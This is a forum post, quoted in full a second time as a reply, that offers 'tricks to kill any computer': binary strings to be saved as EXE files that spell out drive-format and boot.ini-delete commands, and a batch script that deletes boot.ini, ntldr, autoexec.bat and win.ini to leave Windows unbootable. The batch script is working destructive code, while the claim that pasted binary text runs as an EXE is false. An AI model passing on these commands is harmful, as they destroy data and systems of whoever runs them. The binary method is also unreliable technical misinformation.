rajwansh2003
Journeyman
These are the few tricks to kill any computer I got it from my friend
I have not checked it can any one check it !!!!
To Format a C drive
Copy/paste this into Notepad and save it as an EXE file (not BAT)
Code:
01001011000111110010010101010101010000011111100000
If that doesn't work, try this
Code:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
To Format a D drive
Code:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
To Format an A drive
Code:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
Deleting The Boot.ini
You can use the same method as above to create an EXE file that deletes the Boot.ini
Code:
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Deleting Boot.ini with a BAT file (this works I have lost my boot.ini)
Or if you prefer the old BAT command, save this in Notepad as a BAT file(although this deletes other files too)
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
I don't know that this is allowed to post such thing but i am posting this tricks to increase the trick ability who are unknown to it !!!!
Reply
I have not checked it can any one check it !!!!
To Format a C drive
Copy/paste this into Notepad and save it as an EXE file (not BAT)
Code:
01001011000111110010010101010101010000011111100000
If that doesn't work, try this
Code:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
To Format a D drive
Code:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
To Format an A drive
Code:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
Deleting The Boot.ini
You can use the same method as above to create an EXE file that deletes the Boot.ini
Code:
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Deleting Boot.ini with a BAT file (this works I have lost my boot.ini)
Or if you prefer the old BAT command, save this in Notepad as a BAT file(although this deletes other files too)
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
I don't know that this is allowed to post such thing but i am posting this tricks to increase the trick ability who are unknown to it !!!!
Reply